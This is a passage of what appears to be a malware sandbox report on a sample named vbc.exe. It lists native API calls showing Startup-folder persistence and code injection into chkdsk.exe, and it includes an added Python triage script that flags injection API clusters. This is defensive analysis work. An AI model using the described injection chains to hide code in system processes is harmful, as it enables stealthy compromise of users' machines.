Source: C:\Users\Public\vbc.exe Code function: 5_2_00840078 NtResumeThread,LdrInitializeThunk, 5_2_00840078
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083F9F0 NtClose,LdrInitializeThunk, 5_2_0083F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083F900 NtReadFile,LdrInitializeThunk, 5_2_0083F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0083FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0083FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0083FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0083FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0083FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0083FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0083FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0083FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0083FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0083FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0083FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00840060 NtQuerySection, 5_2_00840060
Source: C:\Users\Public\vbc.exe Code function: 5_2_008401D4 NtSetValueKey, 5_2_008401D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084010C NtOpenDirectoryObject, 5_2_0084010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008407AC NtCreateMutant, 5_2_008407AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00840C40 NtGetContextThread, 5_2_00840C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_008410D0 NtOpenProcessToken, 5_2_008410D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00841148 NtOpenThread, 5_2_00841148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083F8CC NtWaitForSingleObject, 5_2_0083F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00841930 NtSetContextThread, 5_2_00841930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083F938 NtWriteFile, 5_2_0083F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FAB8 NtQueryValueKey, 5_2_0083FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FA20 NtQueryInformationFile, 5_2_0083FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FA50 NtEnumerateValueKey, 5_2_0083FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FBE8 NtQueryVirtualMemory, 5_2_0083FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FB50 NtCreateKey, 5_2_0083FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FC30 NtOpenProcess, 5_2_0083FC30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FC48 NtSetInformationFile, 5_2_0083FC48
Source: C:\Users\Public\vbc.exe Code function: 5_2_00841D80 NtSuspendThread, 5_2_00841D80
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FD5C NtEnumerateKey, 5_2_0083FD5C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FE24 NtWriteVirtualMemory, 5_2_0083FE24
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FFFC NtCreateProcessEx, 5_2_0083FFFC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0083FF34 NtQueueApcThread, 5_2_0083FF34
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D018 NtQueryInformationProcess, 7_2_0039D018
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D0D9 NtQueryInformationProcess, 7_2_0039D0D9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 7_2_0039D010 NtQueryInformationProcess, 7_2_0039D010
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041A050 NtClose, 8_2_0041A050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041A100 NtAllocateVirtualMemory, 8_2_0041A100
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00419F20 NtCreateFile, 8_2_00419F20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00419FD0 NtReadFile, 8_2_00419FD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041A04E NtClose, 8_2_0041A04E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_0041A0FA NtAllocateVirtualMemory, 8_2_0041A0FA
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00419F72 NtCreateFile, 8_2_00419F72
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00419FCB NtReadFile, 8_2_00419FCB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C00C4 NtCreateFile,LdrInitializeThunk, 8_2_008C00C4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C0048 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_008C0048
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C0078 NtResumeThread,LdrInitializeThunk, 8_2_008C0078
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BF9F0 NtClose,LdrInitializeThunk, 8_2_008BF9F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BF900 NtReadFile,LdrInitializeThunk, 8_2_008BF900
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_008BFAD0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_008BFAE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_008BFBB8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_008BFB68
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC90 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_008BFC90
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_008BFC60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFD8C NtDelayExecution,LdrInitializeThunk, 8_2_008BFD8C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_008BFDC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_008BFEA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_008BFED0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFFB4 NtCreateSection,LdrInitializeThunk, 8_2_008BFFB4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C0060 NtQuerySection, 8_2_008C0060
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C01D4 NtSetValueKey, 8_2_008C01D4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C010C NtOpenDirectoryObject, 8_2_008C010C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C07AC NtCreateMutant, 8_2_008C07AC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C0C40 NtGetContextThread, 8_2_008C0C40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C10D0 NtOpenProcessToken, 8_2_008C10D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C1148 NtOpenThread, 8_2_008C1148
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BF8CC NtWaitForSingleObject, 8_2_008BF8CC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BF938 NtWriteFile, 8_2_008BF938
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C1930 NtSetContextThread, 8_2_008C1930
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFAB8 NtQueryValueKey, 8_2_008BFAB8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFA20 NtQueryInformationFile, 8_2_008BFA20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFA50 NtEnumerateValueKey, 8_2_008BFA50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFBE8 NtQueryVirtualMemory, 8_2_008BFBE8
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFB50 NtCreateKey, 8_2_008BFB50
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC30 NtOpenProcess, 8_2_008BFC30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC48 NtSetInformationFile, 8_2_008BFC48
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008C1D80 NtSuspendThread, 8_2_008C1D80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFD5C NtEnumerateKey, 8_2_008BFD5C
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFE24 NtWriteVirtualMemory, 8_2_008BFE24
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFFFC NtCreateProcessEx, 8_2_008BFFFC
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFF34 NtQueueApcThread, 8_2_008BFF34
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00289882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 8_2_00289882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02540078 NtResumeThread,LdrInitializeThunk, 9_2_02540078
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025400C4 NtCreateFile,LdrInitializeThunk, 9_2_025400C4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025407AC NtCreateMutant,LdrInitializeThunk, 9_2_025407AC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FA50 NtEnumerateValueKey,LdrInitializeThunk, 9_2_0253FA50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_0253FAD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_0253FAE8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_0253FAB8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FB50 NtCreateKey,LdrInitializeThunk, 9_2_0253FB50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_0253FB68
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_0253FBB8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253F900 NtReadFile,LdrInitializeThunk, 9_2_0253F900
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253F938 NtWriteFile,LdrInitializeThunk, 9_2_0253F938
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253F9F0 NtClose,LdrInitializeThunk, 9_2_0253F9F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_0253FED0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FEA0 NtReadVirtualMemory,LdrInitializeThunk, 9_2_0253FEA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FFB4 NtCreateSection,LdrInitializeThunk, 9_2_0253FFB4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FC48 NtSetInformationFile,LdrInitializeThunk, 9_2_0253FC48
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_0253FC60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FC90 NtUnmapViewOfSection,LdrInitializeThunk, 9_2_0253FC90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_0253FDC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FD8C NtDelayExecution,LdrInitializeThunk, 9_2_0253FD8C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02540048 NtProtectVirtualMemory, 9_2_02540048
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02540060 NtQuerySection, 9_2_02540060
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025410D0 NtOpenProcessToken, 9_2_025410D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02541148 NtOpenThread, 9_2_02541148
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0254010C NtOpenDirectoryObject, 9_2_0254010C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_025401D4 NtSetValueKey, 9_2_025401D4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FA20 NtQueryInformationFile, 9_2_0253FA20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FBE8 NtQueryVirtualMemory, 9_2_0253FBE8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253F8CC NtWaitForSingleObject, 9_2_0253F8CC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02541930 NtSetContextThread, 9_2_02541930
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FE24 NtWriteVirtualMemory, 9_2_0253FE24
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FF34 NtQueueApcThread, 9_2_0253FF34
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FFFC NtCreateProcessEx, 9_2_0253FFFC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02540C40 NtGetContextThread, 9_2_02540C40
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FC30 NtOpenProcess, 9_2_0253FC30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FD5C NtEnumerateKey, 9_2_0253FD5C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_02541D80 NtSuspendThread, 9_2_02541D80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009A050 NtClose, 9_2_0009A050
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009A100 NtAllocateVirtualMemory, 9_2_0009A100
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00099F20 NtCreateFile, 9_2_00099F20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00099FD0 NtReadFile, 9_2_00099FD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009A04E NtClose, 9_2_0009A04E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0009A0FA NtAllocateVirtualMemory, 9_2_0009A0FA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00099F72 NtCreateFile, 9_2_00099F72
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00099FCB NtReadFile, 9_2_00099FCB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA93EE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_00EA93EE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA9882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 9_2_00EA9882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA93F2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 9_2_00EA93F2
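Reading the block above: most entries name one function per native API (each paired with LdrInitializeThunk), which are thin wrappers around a single syscall. The entries worth an analyst's time are the ones that chain several calls in one routine: 8_2_00289882 and 9_2_00EA9882 (NtQueryInformationProcess, RtlWow64SuspendThread, NtSetContextThread, NtQueueApcThread, NtResumeThread) and 9_2_00EA93EE (NtCreateSection, NtMapViewOfSection twice, NtUnmapViewOfSection), which is the shape of a section-mapping plus APC/context-hijack injector, and the sequence that explains the "chkdsk.exe" process appearing as a source at all. The script below is an added example, not part of the sandbox report: it parses these evidence lines, reports per process which injection API cluster is reached and which single function chains a whole cluster, and ranks the "String function ... appears N times" lines. The technique clusters are my own heuristic grouping; the sample lines are copied from the report.

```python
import re
from collections import defaultdict

# Evidence-line shapes used by the sandbox report. A "Code function" line
# names one function by "<process>_<run>_<address>" (the id is repeated at the
# end of the line) and lists the APIs that function calls, comma-separated.
CODE_FUNC_RE = re.compile(
    r"^Source:\s+(?P<source>.+?)\s+Code function:\s+"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+)\s+(?P<apis>[\w,]*?)\s*(?P=fid)\s*$"
)
# "String function: <addr> appears <n> times" lines (call-count heuristic for
# string-decryption / allocation helpers).
STRING_FUNC_RE = re.compile(
    r"^Source:\s+(?P<source>.+?)\s+Code function:\s+String function:\s+"
    r"(?P<addr>[0-9A-Fa-f]+)\s+appears\s+(?P<count>\d+)\s+times$"
)

# Heuristic API clusters (my own grouping, not the sandbox's). A process whose
# functions collectively reach every API of a cluster is flagged; a single
# function that chains the whole cluster is the stronger finding.
TECHNIQUES = {
    "section_mapping":   {"NtCreateSection", "NtMapViewOfSection"},
    "process_hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "apc_injection":     {"NtQueueApcThread", "NtResumeThread"},
}


def parse_report(text):
    """Return ({source: [(fid, [api, ...]), ...]}, {source: [(addr, count), ...]})."""
    calls, strings = defaultdict(list), defaultdict(list)
    for raw in text.splitlines():
        line = raw.strip()
        m = STRING_FUNC_RE.match(line)
        if m:
            strings[m["source"]].append((m["addr"], int(m["count"])))
            continue
        m = CODE_FUNC_RE.match(line)
        if m:
            apis = [a for a in m["apis"].split(",") if a]   # drop the trailing ''
            calls[m["source"]].append((m["fid"], apis))
    return dict(calls), dict(strings)


def flag_techniques(calls):
    """{source: {technique: [fids that chain the whole cluster]}}, listing only
    techniques whose cluster the process reaches somewhere in its code."""
    flagged = {}
    for source, funcs in calls.items():
        reached = set()
        for _, apis in funcs:
            reached.update(apis)
        hits = {}
        for name, cluster in TECHNIQUES.items():
            if cluster <= reached:
                hits[name] = [fid for fid, apis in funcs if cluster <= set(apis)]
        flagged[source] = hits
    return flagged


def rank_string_functions(strings):
    """Most-called 'string functions' first: the first places to look for the
    string-decryption routine when reversing a sample like this one."""
    rows = [(src, addr, n) for src, lst in strings.items() for addr, n in lst]
    return sorted(rows, key=lambda r: r[2], reverse=True)


# Sample input: lines copied from the report (a small subset).
SAMPLE = r"""
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_008BFC60
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_008BFFB4 NtCreateSection,LdrInitializeThunk, 8_2_008BFFB4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe Code function: 8_2_00289882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 8_2_00289882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_0253FE24 NtWriteVirtualMemory, 9_2_0253FE24
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA93EE NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 9_2_00EA93EE
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 9_2_00EA9882 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 9_2_00EA9882
Source: C:\Users\Public\vbc.exe Code function: 4_2_00192858 4_2_00192858
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0259373B appears 238 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 025BF970 appears 81 times
"""

if __name__ == "__main__":
    calls, strings = parse_report(SAMPLE)
    for source, hits in flag_techniques(calls).items():
        for technique, fids in hits.items():
            where = ", ".join(fids) if fids else "spread over several functions"
            print(f"{source}: {technique} ({where})")
    for source, addr, n in rank_string_functions(strings):
        print(f"{source}: string function {addr} called {n} times")
```

Run against the full report text, the per-process output is what you would paste into a triage note: chkdsk.exe reaches every cluster, and the two fids that chain a cluster on their own (9_2_00EA93EE, 9_2_00EA9882) are the addresses to set breakpoints on when reproducing the injection in a debugger.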
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00192858 4_2_00192858
Source: C:\Users\Public\vbc.exe Code function: 4_2_001998F0 4_2_001998F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019D138 4_2_0019D138
Source: C:\Users\Public\vbc.exe Code function: 4_2_00191540 4_2_00191540
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019A6D8 4_2_0019A6D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00192868 4_2_00192868
Source: C:\Users\Public\vbc.exe Code function: 4_2_00196960 4_2_00196960
Source: C:\Users\Public\vbc.exe Code function: 4_2_00195300 4_2_00195300
Source: C:\Users\Public\vbc.exe Code function: 4_2_00198BC8 4_2_00198BC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00192D60 4_2_00192D60
Source: C:\Users\Public\vbc.exe Code function: 4_2_00196E10 4_2_00196E10
Source: C:\Users\Public\vbc.exe Code function: 4_2_00196E00 4_2_00196E00
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019C678 4_2_0019C678
Source: C:\Users\Public\vbc.exe Code function: 4_2_0019DF90 4_2_0019DF90
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F6468 4_2_002F6468
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F1888 4_2_002F1888
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F3CE8 4_2_002F3CE8
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F2158 4_2_002F2158
Source: C:\Users\Public\vbc.exe Code function: 4_2_002F1540 4_2_002F1540
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D72050 4_2_00D72050
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D997 5_2_0041D997
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D20B 5_2_0041D20B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409E30 5_2_00409E30
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D6BE 5_2_0041D6BE
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084E0C6 5_2_0084E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0084E2E9 5_2_0084E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F63BF 5_2_008F63BF
Source: C:\Users\Public\vbc.exe Code function: 5_2_008763DB 5_2_008763DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_00852305 5_2_00852305
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089A37B 5_2_0089A37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D443E 5_2_008D443E
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D05E3 5_2_008D05E3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0086C5F0 5_2_0086C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00896540 5_2_00896540
Source: C:\Users\Public\vbc.exe Code function: 5_2_00854680 5_2_00854680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085E6C1 5_2_0085E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F2622 5_2_008F2622
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089A634 5_2_0089A634
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085C7BC 5_2_0085C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085C85C 5_2_0085C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0087286D 5_2_0087286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F098E 5_2_008F098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_008529B2 5_2_008529B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_008669FE 5_2_008669FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_008E49F5 5_2_008E49F5
Source: C:\Users\Public\vbc.exe Code function: 5_2_0089C920 5_2_0089C920
Source: C:\Users\Public\vbc.exe Code function: 5_2_008FCBA4 5_2_008FCBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_008D6BCB 5_2_008D6BCB
Source: C:\Users\Public\vbc.exe Code function: 5_2_008F2C9C 5_2_008F2C9C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008DAC5E 5_2_008DAC5E
Source: C:\Users\Public\vbc.exe Code function: 5_2_00880D3B 5_2_00880D3B
Source: C:\Users\Public\vbc.exe Code function: 5_2_0085CD5B 5_2_0085CD5B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00882E2F 5_2_00882E2F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0086EE4C 5_2_0086EE4C
Source: C:\Users\Public\vbc.exe Code function: 5_2_008ECFB1 5_2_008ECFB1
Source: C:\Users\Public\vbc.exe Code function: 5_2_008C2FDC 5_2_008C2FDC
